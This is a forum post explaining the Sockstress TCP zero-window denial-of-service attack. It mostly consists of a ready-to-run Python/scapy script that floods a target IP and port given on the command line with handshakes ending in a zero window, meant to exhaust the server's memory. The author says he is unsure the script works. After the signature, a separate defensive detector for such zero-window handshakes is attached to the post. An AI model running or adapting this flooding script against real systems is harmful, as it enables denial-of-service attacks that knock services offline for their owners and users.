Sockstress Exploit!


Post by Fl0urite on Sun Apr 13, 2014 7:34 am

This took me a few minutes and some googling to create. For those of you who do not know what Sockstress is, it is an exploit that takes advantage of a design flaw in TCP during the 3-way handshake.

Here is how it works:

syn -> (4k window)
<- syn+ack (32k window)
ack -> (0 window)

The 0 window size basically says the client's buffer is full, but the server prepares and stores the connection in RAM; basically it waits until the client is ready.

What Sockstress does is create loads of connections like that, causing the system to crash (RAM full), until the plug is pulled.

Here is a video with a good example of the Sockstress exploit:

https://www.youtube.com/watch?v=8B6tvJMfaDU

and a more detailed explanation. :lol:

Please refer to this Wikipedia article for more info:

http://en.wikipedia.org/wiki/Sockstress

Here is the code for the exploit. It is not extremely powerful, but you don't have to compile or have a VM or anything like that. Anyway, hope you guys like this :P

I am not totally sure if it works or not :/ as I can't get many cp/s.

Code:
#sockstress exploit with scapy
#coded by fl0urite
#Not totaly sure if this works
#v1.0.0
from threading import Thread
from scapy.all import *
import time
import sys
import os

ip=sys.argv[1]
port=int(sys.argv[2])
threads=int(sys.argv[3])

def Stress(ip,port):
   global connections
   global threads
   global failed
   global stop
   connections=0
   failed=0
   stop=0
   while 1:
      if stop==1:
         threads-=1
         exit()
      try:
         sequence=random.randrange(0,99999)
         i=IP(dst=ip)
         syn=i/TCP(sport=1500, dport=port, flags="S", seq=sequence)
         syn_ack=sr1(syn,verbose=0)[TCP].seq+1
         ack=i/TCP(sport=1500, dport=port, flags="A", seq=sequence+1, ack=syn_ack, window=0)
         send(ack,verbose=0)
         connections+=1
      except:
         failed+=1
for i in xrange(0,threads):
   try:
      t=Thread(target=(Stress),args=(ip,port))
      t.start()
   except:
      print "Could only start "+str(i)+" threads."
      break
while 1:
   try:
      time.sleep(0.1)
      print "\033[1m\033[5;0;31m"+str(connections/time.clock())+" cps "+str(connections)+" total           "
      print "Press ^C to stop...\033[0m"
      print "\033[3A"
   except KeyboardInterrupt:
      stop=1
      break
while threads>=1:
   print "\033[5;0;31mWaiting for "+str(threads)+" to finish...                  \033[0m"
   time.sleep(1)
Fl0urite
New User
Posts: 6
Joined: Wed Feb 12, 2014 5:01 am
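The handshake pattern described in the post (SYN, SYN+ACK, then an ACK advertising a zero window) is also what a defender can look for. The following is an added example, not code from the original post: a small per-connection handshake tracker that replays constructed TCP segment records and reports any client that keeps finishing handshakes with window=0. The record format, the sample addresses and the threshold are assumptions.

```python
# Added example (not part of the original post): a defender-side detector
# for the Sockstress pattern. It replays constructed TCP segment records
# through a tiny per-connection handshake tracker and reports any client
# that completes many handshakes by ACKing with a zero receive window.
# Record format and thresholds are assumptions made for this example.
from collections import defaultdict

# Each record: (src_ip, src_port, dst_ip, dst_port, flags, window)
# Flags use scapy-style letters: "S" SYN, "SA" SYN+ACK, "A" ACK.
def track_zero_window_handshakes(segments):
    """Return {client_ip: number of handshakes finished with window=0}."""
    state = {}                      # (client, cport, server, sport) -> stage
    zero_window = defaultdict(int)
    for src, sport, dst, dport, flags, window in segments:
        if flags == "S":
            state[(src, sport, dst, dport)] = "syn"
        elif flags == "SA":
            key = (dst, dport, src, sport)   # reversed: server answers client
            if state.get(key) == "syn":
                state[key] = "synack"
        elif flags == "A":
            key = (src, sport, dst, dport)
            if state.get(key) == "synack":
                state[key] = "established"
                if window == 0:          # third packet with a zero window
                    zero_window[src] += 1
    return dict(zero_window)

def flag_sockstress_sources(segments, threshold=3):
    """Clients whose zero-window handshake count reaches the threshold."""
    counts = track_zero_window_handshakes(segments)
    return sorted(ip for ip, n in counts.items() if n >= threshold)

# Constructed sample traffic: 198.51.100.7 runs the 3-way handshake five
# times and always finishes with window=0; 203.0.113.9 is a normal client.
def _handshake(client, cport, server, window):
    return [
        (client, cport, server, 80, "S", 4096),
        (server, 80, client, cport, "SA", 32768),
        (client, cport, server, 80, "A", window),
    ]

SAMPLE = []
for p in range(1500, 1505):
    SAMPLE += _handshake("198.51.100.7", p, "192.0.2.10", 0)
SAMPLE += _handshake("203.0.113.9", 40000, "192.0.2.10", 65535)

if __name__ == "__main__":
    print(flag_sockstress_sources(SAMPLE))   # ['198.51.100.7']
```

A zero window later in an established connection is ordinary flow control, so the tracker only counts a zero window on the ACK that completes the handshake, repeated across many connections from the same source.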